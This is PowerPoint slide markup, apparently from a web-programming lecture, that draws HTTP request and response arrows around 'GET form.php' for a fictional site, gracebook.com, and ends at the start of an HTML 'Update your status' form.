              <a:ext cx="4686935" cy="171450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4653715" y="66399"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4648581" y="66399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648708" y="104499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578234" y="104578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4524756" y="135868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4519076" y="140846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515897" y="147409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515433" y="154709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517898" y="161903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4522948" y="167509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4529534" y="170650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536811" y="171100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4543933" y="168634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4686427" y="85449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4653715" y="66399"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="71606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="109706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578234" y="104578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4578234" y="104578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648708" y="104499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648699" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4648589" y="69066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648699" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648589" y="69066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4648581" y="66399"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648589" y="69066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648581" y="66399"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4536612" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4529312" y="502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4522749" y="3694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517771" y="9376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515306" y="16498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515770" y="23774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518949" y="30360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4524629" y="35411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4653715" y="66399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4543806" y="2391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536612" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514600" y="2510154"/>
              <a:ext cx="3886200" cy="683260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="683260">
                  <a:moveTo>
                    <a:pt x="3886200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627754" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6142354" y="2934461"/>
              <a:ext cx="258445" cy="258445"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="258445" h="258444">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23" name="object 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514600" y="2510154"/>
              <a:ext cx="3886200" cy="683260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="683260">
                  <a:moveTo>
                    <a:pt x="3627754" y="682751"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3679444" y="475995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627754" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190744" y="3467608"/>
            <a:ext cx="1505373" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-93" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form.php</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3867437"/>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26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3867438"/>
            <a:ext cx="2413000" cy="361574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33020" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="513067">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2492926" y="4370493"/>
            <a:ext cx="6154420" cy="944880"/>
            <a:chOff x="1869694" y="3277870"/>
            <a:chExt cx="4615815" cy="708660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1869694" y="3414541"/>
              <a:ext cx="4615815" cy="171450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4615815" h="171450">
                  <a:moveTo>
                    <a:pt x="149742" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142620" y="2393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142620" y="168763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149742" y="171156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157019" y="170668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163605" y="167513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168656" y="161905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171049" y="154709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170561" y="147395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167405" y="140795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161798" y="135743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108457" y="104628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37973" y="104628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37973" y="66528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108458" y="66528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161798" y="35413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167405" y="30360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170560" y="23760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171049" y="16446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168656" y="9251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163605" y="3643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157019" y="488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149742" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4615815" h="171450">
                  <a:moveTo>
                    <a:pt x="108458" y="66528"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="37973" y="66528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37973" y="104628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108457" y="104628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104103" y="102088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47498" y="102088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47498" y="69068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104103" y="69068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108458" y="66528"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4615815" h="171450">
                  <a:moveTo>
                    <a:pt x="4615560" y="66528"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108458" y="66528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75800" y="85578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108457" y="104628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4615560" y="104628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4615560" y="66528"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4615815" h="171450">
                  <a:moveTo>
                    <a:pt x="47498" y="69068"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47498" y="102088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75800" y="85578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47498" y="69068"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4615815" h="171450">
                  <a:moveTo>
                    <a:pt x="75800" y="85578"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47498" y="102088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104103" y="102088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75800" y="85578"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="461581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sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="object 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2510536" y="3290570"/>
              <a:ext cx="3886200" cy="683260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="683260">
                  <a:moveTo>
                    <a:pt x="3886200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="682815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627628" y="682815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6138164" y="3714877"/>
              <a:ext cx="259079" cy="259079"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="259079" h="259079">
                  <a:moveTo>
                    <a:pt x="258572" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="51688" y="51689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="258508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258572" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CDCDCD"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="object 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2510536" y="3290570"/>
              <a:ext cx="3886200" cy="683260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="683260">
                  <a:moveTo>
                    <a:pt x="3627628" y="682815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3679316" y="475995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627628" y="682815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="682815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124365" y="4508330"/>
            <a:ext cx="1626447" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;body&gt;…</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3652180" y="4907991"/>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34" name="object 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3652180" y="4907992"/>
            <a:ext cx="2413000" cy="361574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33020" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="205735">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Response</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>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7"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-167" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>acebook.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>om</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 3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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1966772"/>
            <a:ext cx="9113520" cy="3478387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="73659" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="579"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="447"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;div&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="453"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Update</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-47" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-47" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>status:</a:t>
